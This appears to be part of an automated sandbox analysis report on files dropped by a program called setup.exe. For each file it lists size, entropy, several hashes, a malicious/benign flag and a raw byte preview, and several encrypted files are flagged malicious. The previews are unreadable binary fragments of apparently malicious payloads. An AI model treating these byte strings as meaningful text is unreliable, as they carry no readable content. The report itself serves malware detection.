              SHA-512:CD2628B8F95CE2EAA0B1B7537816B86F3801A0B4121E09D9947AEA78B0C4E5388F58309FFFD102E8BD9B5785CF9535AAD9ADE12A7C6D8AF6436A040EF5FEB8ED
              Malicious:false
              Preview:.....N....5......vqe..1..T&...+..<..n...=f.......(....4...b.->..^! ._:......0....M.....a..\O.'.....# .."'..8....L+....(.PT.D..?.5..+...9-!.nM..%o.*.{.H|\.v..9..M............7....X....*.>y...P ...fL...3.MA...7%.mccb...98......]qp......C5.Qp.6h}..S.......E.L..|.../.^.2.tEM!..fQ..,.$c.T_n.`...@p...Vn. .p..+.:...e.@..Q.{] ....8......k..?$..Y.....\.XX.7..t~..48........:k.9F_...(3?.e%C..o`.N..x....4(.=(.a.O..=W.......hg#..z...K.L...]O.....E.1.am..mq./^...e.3..=.........?yX.:.K..].a.W}.v..,GD..3.W9\.m{h....l}...c..$h_71.[0R.3k.A3n. ..A............;R.K.[..$"b.>.Z9vN....sT.G..7.Wn.u.S.....$|z]7...$.Q.. .....]....o../.d....c.S".a.k.O..r..BK.../0..ny....e.......Jj{.j....4...h>(..{.5....d!#...d.......3.....|....o6\..FZ/D.P.....7.....g..$...J.:.E.%M?8..wy.v*..{.....AA..L...w..C.lb._L....a.Amb*.P..]o....5.{..z.}..Ys.c..L..`..i.W.D........a5{R..m.T..{.=3n.7......+.o1$..w.$w..'...(..8...*6..c...^.+.%.L............uXy..GwS....8...W...7*..s
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2076412395231846
              Encrypted:false
              SSDEEP:3072:UWW+vRxCC2zJShenaPC2hzy7wKt7VtzeqKwkOFkaZ4Ef84u9HtMQ2z:UWW+vZgJScnrmyXt7PzcdOFpKl4mHtCz
              MD5:803C3F1155250D706FE0AE441E2D4A39
              SHA1:56AA6EFA325870B1F17683D912B659D11F052A59
              SHA-256:66F09B83F6D7532F96A8EE18EF166C1D052A1BD442648832E148815F37587E02
              SHA-512:5D0F41BC82E4FA56263792A7FC098885451D775B1055755413F560FF0DC02C6A9DC7AC8A935B3FA2513251049AA4F42ADE53A3409630B628550B1038B1284FC2
              Malicious:false
              Preview:.......mk....L.q.#w.(.^^....?.J.5.h.....a..]...#..\.M...........n..Z.%d...uj..+.).T00..4s._`..TvO.T..r._.u..b`...D..5Q.C....V{..?.z.=0..."..../.EU..cw<. ..Q..g........?1..q....[F.......H.CY..2a.L....VOYl...}SE....f{..F.;..MR..9.whE............N..L(.............(B..."...4zO...."<q......be..+W.1P./w}V.........;+.}.#...d...".x.ug..\sY.X........&3Lu...H.w....l7@1..$..o5(....EU.}3m........E:...K..=..X.XE..Ja.q..J.K.....>.A.1..{.........<W.b..*6......}Z.<9.........m...C6..'...v(.1.(....v<.......PU...*....+..M.=L.".r...I/..T..R=.j . 48.jz....7.1vpf...@._.........ij@...G....1.L..X9G...h*..F.<.Xj........9.QP.n..:9...S..BC.C......$..@....3j..........%`,|......6.(n.....<.Jxw)..V[).....:.|....x`aH..).9?....?.....m.....f.....=0......`...R...b,V.l....3...O.G8...2....Z);....J).....SF...C..5....[.3.f.=.O.,.i9...*D....SX..7Z..^....{,.r(#E...P...{5.A+.._.: N0.....Q..<...^.Z.>.=....F..7P....g.=...].u......O.......*>.._w.W....V9......~.#.5..T.O!.{)......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2074660288567065
              Encrypted:false
              SSDEEP:3072:iwzNb6VSHx6JCVdQ0rajzIz53x+fNHKHNmeeSPOm:db6VSvVdQuzz4Kt3eSWm
              MD5:B255B416FB9307A8B5D78D11F1FF5EE7
              SHA1:A49E9761DA907D5F15B48C68242DACF9734A3DFB
              SHA-256:48F299F9289362BA4A240F31E5F33A2E2B350C80ED0A7138D855FF31206E1CFB
              SHA-512:188C2F73A154310E9DD5BB21CEF7A132B26407FD63CBBA18CF282722CCBEA860F405FCA2BBFDA9EB0A0CDE84E8FD1B29C5ACAD486FC80F313DE0E997FA715579
              Malicious:false
              Preview:.....@.C.....L.?.....ub..;K..Pt.u...$..s.g...WC.M....'.. ...Z.-....kz..C..n.b.D..Z.CLe.hnU..u=...ep.m/x..b..6..{..h<>...+..E-A%...DG.....<../...(b..>..+..E....J...i..G........x.4.!.............J.<3.8..AZ.A[.l.(._..7.|"...F7tg........R#6.Rz.Xf...........NLHlHD.4h..NJ.:..\...../{..P...j...q..+.....K.Y.......d=.....$sW.)Z..~..h:{.6.w.oF{>...8fY!.=y.._|..e.2N".Q.......4.$;.*....).9.........t......Q........g...>\...m..0...M......k...g)..#.J]'.z...d....)>..C)......G}`.z(#.I..9........U..f...~..w+~........y.y?..SY;H.g......g....P...H....L.F=.....v".-.qkO...g00..r.JhI.5}..E..8y.w6G...Zk.R...q....=....5-4vr.....8=PM.H..>.._.[J*..B.T<(..0..f.e...i/.+Y-6@xv..&.....Rg.._?k%...8....@....O'..'...._......vok`.&XX....Q..x."...Mi....f..~6<1J..:.../.,1..2F.+..d....ZB.i.z.R.d!A..X..wA......r......v...;...[...3....y....y..6.Oy.......w`.B.v...Bi/..[q..`..f.sI....;.'......H...]*.....N.....1'?<$M.An.."..P$....g..B......_...M..../...|..v.2....#.W&.'......._+..@7
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):496
              Entropy (8bit):7.500674613242136
              Encrypted:false
              SSDEEP:12:jBBJ4V3z62WkrbK6dv7TF6hFRxZsAYPlke1sMR2cii9a:jBcJ+2dbt+RfJYqFbD
              MD5:D54B9A8EFE7A7060B5B9A3D8961AA36F
              SHA1:F409F3FB642E3EC59F3892991E7C5EF70FD04C36
              SHA-256:EE8D6392B9FF06A67395ECEEB86580301293CF599287F87E479EDEA0DA3C4F12
              SHA-512:6A86A5595C1EB10BE85B690A5EB6C901C98899250F59B090FE031F9BBDA873883531D86AE46D75FCF1BDED98C5A0920ABF7FE411AE03200816C93F51B90FCCD9
              Malicious:false
              Preview:WindoI.}..L...U.+.....p.E..PM\.4`u.YJ..v.:1B..M.}.l.&.|..$...............C...{.S..b..iM.H......<-.....7..LO....|.,.8U17...|.l|...&.0.#.....<.[... J..j..L...*.s../Z.*2.-X.T>...n.D^........."...0.@$..n...$....d..L...wrq'7....KeS-..~+@.K.j(.h.,x.w.\..5.q....2....^I..d.jR.2Hm6<....0.I..o9.0.z....n....v.vq..z;...nG.y..'.|#;vZ...H.}.....^.|;...:.x....}......}zs....\..t@.J..j....L.w...b1.C....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):533084
              Entropy (8bit):6.256817786793879
              Encrypted:false
              SSDEEP:12288:+QQ1N9wK81fJgTEn10pbxjiuTsP583eAMwQknzBce:XqPwx1xhnCreG45epZ/
              MD5:4F2FFABEC01120AE64447403470EDFFD
              SHA1:91566B9F214A17BCB71BADF726BD4E27EDEA0B20
              SHA-256:1400C732ED51BDD0BABF1226E4AEFD34872E340671BAA36D22DCD143715181DF
              SHA-512:F549F22E57D8B98AFB68270581AE6B14FA10D3CBC48C31D19477E34A602E72A2DDADD5FA5235367199160FBEEA6AD3ADEE6CFDED6977C62B0FA9ED71EA52FD8E
              Malicious:false
              Preview:marke.'i.nP%.vd.....B...M:..0.|....Y..'".....o...~....?Y+{Q/.m...J. ....m.k.t...*T..8..:..5.....v.....i?...m...K.4..>^.C.n..E....5s.....?\.. ...x.|.....=#.-......./).H...f.C+?l..N.0.G~.(.>....S..+b...u..].f..{...J.?.G.M...Yn..-}....L1. hX(..G.(..q.!.2...+.~...M.dgj:..e...62.=.........q$.C...1.. ....bZ.4..+%.@....8G...-f$.q....m.jf......Ns............{..8....O0.d....J.".v.....f[.._$m..]lr3..}.....i.....'.Y!G..I..[.4.*.,mi.u...1#F..!%.:....:.T....n..L}'..^bh3......Od.._.-@...5..6....^v..I.(.*8...>..I.....(.q.v.}.U....n.i..VC_.Y.H#......n..9.<.Hk.k.*..bT..Z9..F!A....'7.......)....,.2.O..u.....J.\f.{67....{Xk_$..G_.p..T._........j.".,...e..N.F5%.1gNd.;DO-sB.C.."_Og/..{&l.=.A4.F......=\....E..6^>.iD..i.n.<..g.;-.2....9.-.r.......}.b....o1F.p...t....s.V?.%.B.(..K.9X...[J....g...h....TW.{.~.......A..=...j N5$w,U.0z...yl.L.2n:.=..7....r7P.c.Z......y...... g...w.AO.;... ...@...a.NJ...(...u"...V..Q ....a6a\..H.;M..v..jX.......2^..2_cD>f.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):44833
              Entropy (8bit):7.995531057938581
              Encrypted:true
              SSDEEP:768:uZeTqV8YsdJfMz2o6BcBfOcHeQKC2JQZe0e40E9Bbm3douleXtZ0h5rKEb5:uZeTaDyoWKfYQK/SXF0abmtouI9Zo5+q
              MD5:D1BFACBFD20BFFA96A31193A88AF2C4C
              SHA1:C29A7EE60376ED3ECE5850F54F486970277A72A9
              SHA-256:50742D296AFE83DD83BF8CDB407BDB18D8103EA454D0A80E0C5105CE5B0695A6
              SHA-512:6D36B9F9919458453A0A9A8B15F60A305CC9744F808F93E1D105720B3CF4AB5C36CCCD33FC85195E2A53DA19EF037650732800B66E142E9FDFFD10FBCF3937D9
              Malicious:true
              Preview:AAA_S.@...>.a....3..?S]...a.......t^X(u6.$..........`.B.D....d.."....c."\...}.WDj..:D.......,Y.y:..-2.A<.q"........j.v.M.1.di.....F.....D.....C...l3.Wu....;..1....6..Z.....Vb..t..jP.h] .:...;J.;.P..gQ..Zq..PJ.2.s.l.A ..t..".\F.@G)>.@Q...+._...>5A.;+.y.V5....<..H.H.o..%...G..D..:....|n..B...#.. >9...E..<......`+.....Ks...4(.Vm.+?.....72.z,.SCx. .....{.'.".7...E.5:V..%...}..._rJ.W..>.,.....j..u.g.........."...a.........`....a.=Q...G..,. .:..F.sq....^.......%.%i....$..7g....b.0X..L3.F~.....F...0..\.d...s.w..'*.Z...'0.qsH%...^.}j..'..i.]F.....x^N.XA;Q.~$.}?.~...l.x..d.~..r...:|d.^d..TZ.......E...y...T...F.U.../k...[..................0...T..e....g.6:...oH.....T.dA.l.a.%H|.x{......^G...3.u.y5v..o...k.\..z:?HZ.{I..H<.C..\of........6.4..^.-...0.A.Xhm..SZ.X;...fh0......Xc..9..C...]vM....../D...;............!..o..+..7.n..q.L..{.....B0.........$.MTP.....u$s#a<|evPMp.....0...B..uS.=A.M.j.T.'.*).A..I...y..Y*.c......q.'\R....c..VE.x.h.L\...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):104051
              Entropy (8bit):7.998402764766925
              Encrypted:true
              SSDEEP:1536:MOo5J+y6Fo1j0OYNkc5eSgd6d4sAcpAlvY1CGObhTLKWwZiGCjy4iDdIun2Urkr9:MOoL+G2NkCgaYvcLsofCO4iXnj0f
              MD5:BD93FCD8B3371DF3BE3FD064397A0491
              SHA1:EAFA69CFCAF2D34DFABB30414D6FA05B36ED7C0E
              SHA-256:3014D1163C31F26FEF2FE08540E8EF6B99D54D2EA10A552C50074FB626B3BC47
              SHA-512:DF27E47059C47C7991DD9788B769ADA45F777DCE66C031073CDB187092CAD26C2D3172FBA84FF57F358DD447BBE28222CC2BD76C70B9B59F850B73DD4DE0CF12
              Malicious:true
              Preview:*|pri..;U.......:.`....e..gk>..}.@..k...(ol..ZF...N6/..v.7..a-.t.......0.c.4.......g=........Q...+..6gKw..+.K.!..a~5.. ..N.sZ..{u.,..^.ais.V..u.v.9...!hEa..........y-F...v.(l\.|....V.J.:Tmz.\L.]..d...U.adF...........>.l%..j...g.......[..0.<.......X`./......3.v...\.H+-FSr.#./.t.V...5.8...5..;`...[.I.i5........rA6........b\..[....%....Iz.>...[....Y....<i..d.B.5....6....F:b..E..Z.y`j..8..^.=.x|.~k.?...U.fc.-.9..@..Q/..7...grR2EU:......KlE.O9.... .a.J.....S^..%.0.'.1.bf..[%s[.[.d.U..Z......%..&..Y.!......S..ah....?W..o.........r.v=...^...j[..I................/.....q..L..%u..f..].@..:....~..m.n...j.)vu.%p.7&x.....i....%.o....,.|....J../..\.EL..D..2Ux......{g.a.J....QJ....P1h ..O..."c.w.......y.....q..<-..l..2} ....$o.=$RU....&/N_p.......Va.A...cmAsX..__......H2.&.... J..\x.p..^.-.@.u.y...y.:hj.~<Ol.6.P\`.!..c.B.!......"@.n.'Z.'pT{T...bz.M5^*@...b.r..4R.&2.Q......(T.O."/..F..x{a[Q.oU..=.../.......N$.3%.{\..O..{..............E..^f.8JFZ..j......X?Y...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):217852
              Entropy (8bit):7.584499503333066
              Encrypted:false
              SSDEEP:6144:fMPG7b1xygb2VTIHf2vq9lY0dupJ/C+jCxc81Cdn:fMPIbHygwTqf2vkYCyJ/9
              MD5:EB83D3521A8B515C550E21805B03C2DC
              SHA1:4671A48F9795D70A32F3CEE7C0149E6EE997BE9D
              SHA-256:51A861DC2AFA425CDFBF7721AC8D194E540CC1D559E7162643AC49762A4FA599
              SHA-512:2E774C2BBC12BAC6FEAA51F76C39AFE736DAD17F12302751605EF00D3D760509B9FD76B7141A30FA0EB0F2E360B8BDD0EB1829C75E80B3BB39E0AB19FA380F2B
              Malicious:true
              Preview:0.0..:...>D...Q....w.}RV...T......}3.........i.m{mv..k.r..E..r..\.U..Z..K....5T.>3.....gf...q(..[8n....L.^ze..xP^..Wz..%.U\.p...F..w.2!@.y.#.y..Tv.G=...z...5.?...y[#.~+.E.2;.8[.<.....u.........o.....w:;....R.p.....i..\.<."*'........:.~.6.A....($..$..4\.Y.,.X.r.2..Oc/.`$.1u.#o..|...2.....?.\._.g...Ulr....._..I..S...K..(.q.n+b$a.I.............[..E.T.|........w[f.^;.....l.....(?:$.y.......Ypg....o.......=6..,...:....Gt*1...a.%.lWw21@r..&...~.^-........z.=6.J....?...?.5....-..0....J~A.#"...*K..t...."u>Kt..e..s...%Z]..............Q..4...,...B|..9.A.Ru1h=4f...,.k4......p..W...>PL..q.0.\Q........^U.g..W-z...y..O.@..]xD..../...5.Io...%d..m...........|........M.3J.P:..[>..(!qBD...m.%4... ....I.(.........`.....v..+)..g.;8W...C[.n.I2^Wu...?..P.Z)q...,v.\D.y._..d..tH.........fOmY[.....h....~....()..Zg..H..h..&..3.qG..Y.. .*a...6u.uh.Ma..C.B..../..IY...x5'bP.+..DL>@".......)<. }R....I..aX...K.g....^6X...#e..y@..G..UnO...j..z..'..K..&.1.L-X.2...Utv..9.`$.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):239538
              Entropy (8bit):7.351185559277606
              Encrypted:false
              SSDEEP:3072:xv3N/21apypE3Qly6Qd35TBzqX/TvWrZeTdx/HfYbmjgcC9ECNEFME3by/pcU7T:9l26CI8xQdZBzqX/TvWrZIj/ffXCNN
              MD5:79A52792A6D7EE3A3E1D6679580F9386
              SHA1:D0F0302291676229622FFDBAF28EB86E2E86FBE4
              SHA-256:9CE4BF5A5B4ED26AB1C43129B44D2E8A5BA16096BA2C118C26AE2E13AC81CDE7
              SHA-512:3601AD0A29F2483A9B6C007A760110023671D925EAB1CC6295FFECF02E97C7DE5D48EC2AFC4F265B7AB73B3B2D705C4664C99139FE3EB436F6CEBD37AE715223
              Malicious:false
              Preview:.....o.......Yd...{@(...%!.".....c.EB0C.vI..C...!2l......v.!R.{.(......G.....zU.._..F=..;...".o2Y.qY.a.._...\.....N.C..........3.D._...T6Tt.C....a...N.1..<f.....nB3|.6..)t.75..F...B.'...e}..uP.GR..1..t.E........Hs....;.~.-%..T.:+.,......1a..:1f.....}...H.s.c{1R....=rMS}t...q..P.S..ch.......Z%.<F.9.sn..H.?x.-.VL...q'.\..n...<..\...PI.`.$<D....~....6......60..`.....+...oJG...c.v..FL35.....d...v..C....H...u#..|U..0.-.......H....>..n7.o..t.=..6%q.N...,.L+.C..k.!...@........wP.W. T..a..3..:..S~....zY...-o.q.l.GXe2.E....(y.......v.o.s<M..|..>#W.N..G~D..:..>.'+........1....i......3...og....J.'..#..n..<$wZ#c.Um)c.^.+..lU....H.w..?`.a..... ...+h.uZ.C.H...5u.D..a.'....4..>.(.D...D.Et..FvVs{&......t........f.@s..5se...d.RM.L.|~...{.#........._..GVKC......p.YY.+...f.|.^..'..../:.+))~.$....'Py.....a`...*..oz`A......]....b3..o_&..f[..3...k.D.......%....s.j.O..>......13A...P..L..l.tg;.6.k..@5.zHC....8.?..*.q./..~..v.Z..6.....M2l....Z...O.0_.U.0_5.+.8;...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1482186
              Entropy (8bit):5.658008801543563
              Encrypted:false
              SSDEEP:24576:Qy4LXxMFjt6az+F3jv8COuZ/kr2bEEYz1jBa/mqkNRM3lVKSu7:50hMDCF8hR3z1rM3lVKSu7
              MD5:216A1BE363A6230A4134594713AAECB5
              SHA1:7F9C56B5C758E8D4D5567F83261F2EE6B2047C72
              SHA-256:52B304F92C68AF920611E93099BDD51A706DDE961DF581C99F774A7EA33CEDD9
              SHA-512:F3B133BB267EF5FFAA4055C393BB2661A9D5ABA6F89C8E6B17A377379DA868A70B701BF45922DF285550B7B99A7D31E0AD6970364B550535B3D22087E0D4316A
              Malicious:false
              Preview:Ej..Dv....L.v.....#...wU..+.0..I... -M.)0.(+..XK........`...[Z.Q...O.......T.N .?:K...H.<..B..K.....a.M9.e..$..-X..........p(P..'(z.D...&..^.R....#.w`.J\.]-....Ih..N....,..m..^td+,hos..z..T...B..}L...........`q+.>.y..t.>.Oa..}.h.6~$...`../.......P....n..hH..R.j.....3..%.]..q..\..I.$i:.&.#..[....km3d.....(b..U...t.u=..G.........!....L..F.....=.m..$/g=..7..P.3..K. ..a....-....|)Qa.)&1EH....:Z+Q.......G.+.D..rD...l.gi{...t...'^.#6y....p....z.%.l......"...$.....gp$|/R..8.$`..(.P..@..W.-.n.1.7...%..A...*.....!.@..#.E.......J.....69.Mu*.b..?....5..S..ZC.*.S...L.t.zX.t..[.8...Z.v...;.E...D...*..q.$....#_.5....5...e.\DS.E....G......?.EnW@..6..y.s...kk]x....j...].<.@."|...JV....B....=_..l.\....(y...m0..r....=|7`.\.._..A.......(...~.....;I.p..J.^.AJ.9...g.Tk..K..)..~j...E,x..(.h......}......$.4......lV..o.@...}3..U}s.G..".}A."....\..O.A..wax....5%&Q.!.o".....t....Fr..7v.}n:;..@...d.....3.= 0..8......w._..$Z.......b-..8.Hp`e2.....*2...1.R..o_.u
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):217852
              Entropy (8bit):7.585696893760884
              Encrypted:false
              SSDEEP:3072:u6t50LMb2eFBCJMxT9Eww9px0BDzPjtONN3HtIrZVgw/hPiCBjCBsIcq0VRfHHEv:uG55pOkW/0BboX3Kr3jCxc81CdQ
              MD5:BF1E1ACE11232978CD26FF0CE5A5084F
              SHA1:1E7F4290E1AF3408B68EB6A4840BC7DCF6780E68
              SHA-256:A202B17864F212EB6EB9666C518982DED37C68694F5C3C07FF45F99CA3C4146B
              SHA-512:4BFFE381815CB9C35601B8433D4BC8B2FDB33616B3BC0B0C8EC0A1DEEA144CD6BF8256E0FFCD99F4DFB0B4A8FCDAF9F54F481FCE9F3A29061B101AF0F72AE4D8
              Malicious:true
              Preview:0.0...A...<h."r.. d.l9./..L... ...f..?.....\+..q....<.....*.Q.*.Y=..|n..f...........MRm.(.n..&..!...k/9..oY.Q97D.W.C..?..\z!+.!.x./.&8......P..M..ZDvQ7ItG._..`"G.5Db.{...V..$.WC...G.@..r..j..C8...2h.>.|.|.g.17......zB...v...;00}.\.{.s......1..&.Q).g.c.F`....!.oh.].z<.Qw:......q.!.#.....Z.u.....z...({:.)..z,=B..Z......J.C..'.99@[7v..#.>C..W..$..";.k....o..*..........Q......mb,...9qs.+AGx.*.E..s...N.GD.`........:...,.t......B/.<0.I.......m@..G1...T..h)........gK....Gf.v...o..#g...J.9A.&.,\...=.v......x....*..f.Oxh....ZxM}4..Z.ZyK..a.J...Z..Ia..3.'..R...m..@.M.D.:[cJ.V.y?)ls...;v............M..x..]..s....?....?..}.*#A.H.....!Y.=. ..XV.0......5S.,{..K-......+.g'.yo.2)v.6_..Y).p.6nx+.E......L&%.....'Bd..X.......y/..nr!M...........0.{.S.ey..g.4`%.Y.ZG9..po...<!....$..z4BJ.:'h......s$....6.8Q~?y...ke.e.#.....g.....Uv........5.D.._,o..B..9X!.0.....g....;.|A.....Y.].....+...[>.wl..m....hN*...-.<!...s.;....K....2\......_|...P.zH..+(.h.....F...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):239538
              Entropy (8bit):7.352454370379402
              Encrypted:false
              SSDEEP:6144:JKs7RhKOMth+8PbXjbJW8oUtbus9r50QCNf:DKth+ebnuNalBs
              MD5:D8518B1B4D4214581DD16C0E4CD5E1A8
              SHA1:2D7EC21601A226B7EB0B132384AD7BF93E949C92
              SHA-256:A794CBDA883C2E02A3CB4AD46A7D420A2027BCD9051C4A60D1567943CD6C74F9
              SHA-512:0CCDE7C802D824F120E7598209CC3BBCEB6D5103BD523D444C18254F0686DB4C6AA48BE97FC2D9864AF29F97FE076AA63C00E8C90B729A01C375ACC67A42953A
              Malicious:false
              Preview:......./.B|......].9%.....G..h#h..r/..$n.q.wUC..O.....'.b.),^.{.k..8..A.M.o...[..U...G2.........8e.......>~.r2......u...j.`Vr...`:.E.M..^r.w.....Vq..~s..n....t.C.........,...pk1....x..6..p.l.~\..!.s......U.^.!....B.Co.J..j.s.On.......H.%&......+..K.T.O.! $....}..G..^. _..*"J.........). >bi...e{m.......d....p`|.7=.'..!.....&{..p`S.edA.O@..RA...L5.xu...5.$.?.a.L.-.j..lv..n........'.k.^v_.a$Y....3.S.-:.].4P.iJWY...R.{.h....x...*X.......#..)...I...C....n..N...1...Ff...p{.;[dA.S....|... /:..Q....5...3.)..=.f.u-....._1M./!...U.u........Z.].....9.......1....g.59X.X.......M.....|q..,..&.iT.7.$.Z..y....Df......:<.1QM...t......3.dX\..;u....(.;.%..p...+.'.).i..<..*\..1.@..6RS.q.,..B.!.Q......s..;h....6.f.....'.C...}.=...!..,d.:.L^..) 5.^~x.....P.yf..y.;.RU.;.....|qa...er|.{..Y\$.NLo....\*.7>.X...dW....H.z.(..%....X.C=.......f...g....en.,.3#.. .j....f;>....F...R.....w t..c..G.&.0..q....~T.e...a-h...OY/...p.s?4.)2O.Pr._N}...b.W.,...s.-).o.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1482186
              Entropy (8bit):5.658669997926438
              Encrypted:false
              SSDEEP:24576:YA10NVd3jt6az+F3jv8COuZ/kr2bEEYz1jBa/mqkNRM3lVKSus:Y9LHCF8hR3z1rM3lVKSus
              MD5:39C76436D806D9630AAFEBC872421F22
              SHA1:7630B7F3AEA5E0F213341C0B0C9E1A7D412F8D64
              SHA-256:DB24B817AC6D27EB836549F0487E3A3AC685C3DC1F1E8B1C76DEE39E75D61A04
              SHA-512:FC02BB64C0A11CF903B3A78A11AE29C397635645D245939A362D3028A80157240686E7D01D198484B3EA03D1EDAFF16376426E37DD0285D3790BA075D1B6BDD3
              Malicious:false
              Preview:Ej..D~.I.jC.........c..0......JREV?7....k....[T.I.y.O.~q.~-GB...K..M........T......>}..{@<.n.u......9.1}L...c.I*.;No...5+8.!48S<..[....A5...H...}....{..g1...B....d=..;.y....oF.....F...H.....U../..8N....A..8DDI{.......)..<.Qr.....'..f..JJ.^n7J......'...J...?.2..f.@....4.......=....l.1.L.y.......G.|/X.3Y.....k!.....EbX.{..hI..@ol...n.....xR...*...o...U...)%.[...=[s7Z.h.w:..+..4....O.....LN..{s.AT...%.`ZK..]R...44....6......8".3....m.r....I....3<..1V.q.9.[|I.1.!6..vl..F...Z..}..tY AA.MfKCD*...@.U..Dj0W.B..K..F.X.....].>.H-.....a/.8*.(J1.l....M. ...W...K(...P......|.z...TO|L3.....(...NH{.._.%..%z.^.p...!.]..u.s......G...>.....'M#....?.-...ph$..Ey...p....jg.^...{.{........Y...M.+..W.e..%.n.k..O......A1...sD../.e..o.H..L.jM...^z.J.v..c.{..Vz.+.y....%.a.TKtCH.7...R......u.#..I/..;)....d3.._.umh.!.$.B.w...3.M..%.d...F......i......^..T_._.".$..y_n5B.....0.u..v."U....Pz.j.K.?.Q..0....6S.p=J...."`WVWgn..E._D........]. .Wg...H...n....Y........&.[Gw....n..*
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):102814
              Entropy (8bit):7.997897588904463
              Encrypted:true
              SSDEEP:3072:TScWILLjO9Nir007ScWqIADA4EUXN8GgHv:TSP8j0NokLjUXu/Hv
              MD5:81C2636E5BDBDBA274765C9C00DDED6D
              SHA1:53859ECD497216E3F66434553ED20781CECE95BB
              SHA-256:62F4E0FB8D1AE511A06C5FE54A7059EC5BCCD96EAAA66D32AB564F1948F641F8
              SHA-512:668F4D4F4085BA9CDAF817189CE3ECB11D3C2B6BC1BD549AEC8D1436C92A3CAD72AD69C61F61B8210CB7D2030F17C9BD4601EC7B12F834E0DD6A81B17AE5B6E1
              Malicious:true
              Preview:[{"Sy@.$.g......}.5...ya.....h.........]fo.o.s......eBa.IiA%.\;..]xM........W.h..G...(.......+.<.b.u.Y......0.*...N.I*1>z..:o...%+E..i.d/>..{..\O~2."..u.cJ............?....8.SZ.^&._....m.-d.;..V.."S....g.c.G5...a.j.V..}{%6l^.B6_.2.....8.....&.....+84J......|.j.V6..RFc....3..N..A. .....pTl...S..P~FJ..:.l...d).{b)!..1..cOaT....*..{....C....Y+..\....'!l".T.k.....mG...H...@N#......b...M....7..%.a...I1..uN=|...:..f.......#.\K....m..j....}..y...^w(...?7^.pN......V....@@.U..Ur-W.:o.1$F_b..M.UM..w/...D.V........q]..=.m.......;fP.dg..u.:.c...U...?...9.9. ...v].....B...<*Y.p..lN....wT^R}W.K..E....H..a..Cf.n.2.(..W!.:}.....=...j..}..G.....Y8."..V....$""..<......;.sN........J.R..h.......n...X......^..jI..6CS.;&..P...mR.E$....]g.Tb%Wk..N.3{...E..".h...c_...........h.0..D...*.U....&%...3..2=.m/n[N/.V.z........%..0.:....qq..}.F.....s..#H........@.z.H%.vY..x.Ux..S..(...a)US..&.....(g...}...p.{( K...=.H.)Ei."v.:.J.<...._...P.@pN...............BK.AX....}cKw.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):104142
              Entropy (8bit):7.998019140489346
              Encrypted:true
              SSDEEP:3072:3yD3g5QsTKj+BkwULMPtIAPOQ4ep5VCVnQpAkp:3qg/EXwL2APOjehCFQpA8
              MD5:51E79FECA89A39CF43F759B2331A0EEB
              SHA1:742278DB48027843AFBA5777CFF9C094AD857A6B
              SHA-256:5CFF49AD65C665460C69FED099B2F9A4A08A4DB499448A8B19CB59443A884740
              SHA-512:4B19F3F8305672AE757379931E3728C21B8FCF14CB06CE490CE552D7F74F59A674010FD4B4E996A852A1764AFA66D3574F8E6ED460123E36DA3F42909E9A09C5
              Malicious:true
              Preview:[{"Sy.!![ e...T...L.g..F..*.u....b...".K.g....?.....-W-....^(.h.m....t........y..g.....JE7..r+.-:...oxH.../... }....J..o..]$P.....8.].......P.0......3Vd..I....D.U...NQ16D.....1ZD...o.Sl...Y.+.Y_].H.f.h0"a..Y......F.C....].z..(ZdB...M.....L.h_X...{.sg........B.7.!$].........cfo*6.XT.hlSg.....=.5I..[l.eU......;..^&.-iV..(37..9.R...^T.E.&-..._t......6..........Q)........I..Xl.Q.W..SlS=._j.g|....\.'....-.I....x4wv.....yf#..p^.WKzC...l....l.YRW......+gu.5.....wQ.N)&?n.h..@F...z$(O..H...V..,}...S_.g......2f..a.)1.i.].w.&V...C..ScF.T6...d..b.x...v.RN3.e5.#+X.#.D.D-.8.........=?q..*.3.6....).O@..A~...`.seH.A...=j......{...>...z..s....*..^..vk>..Mx.m../..U......QH....7<p..}....[p..Q...(.S......b...7.^m..a1n....;....f.=<.e..Q...dE=..Yp........X...w..X....d.%......y<6.e...%.3.T.s...J......x..~..L.....%..~7V.Y).._...g.....w..-.l.J. ..y. 9.c.;G..J[../Q....V!.F.........p.w$&z. ..[p.;jn....) ..[.......U..%...p...A..r......?Jz.g........Qu.?@..R.G
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):104142
              Entropy (8bit):7.998303742843692
              Encrypted:true
              SSDEEP:3072:JrXS9MzXF8K5SA2rnTalyzqweDb7PM5J0:5VzXNct3akqwEg2
              MD5:F24119CB76C567AB9E275ACD82DD7AD9
              SHA1:AC76E3F61190D80A17807FC136D20C4468CE5E7D
              SHA-256:0305E3E2ABF8DEA077CA778E550AF750A9B1BE6FF0D9E407E05920327CA1A703
              SHA-512:99B62778176A9BF9B79F5BB3C2DBE3C6E441A713AC13A31C963BF337EE61BDB7F8140B259614EE2DFCE4882B957B989F8FBEC2472BFABE610993CE2D2C04A55A
              Malicious:true
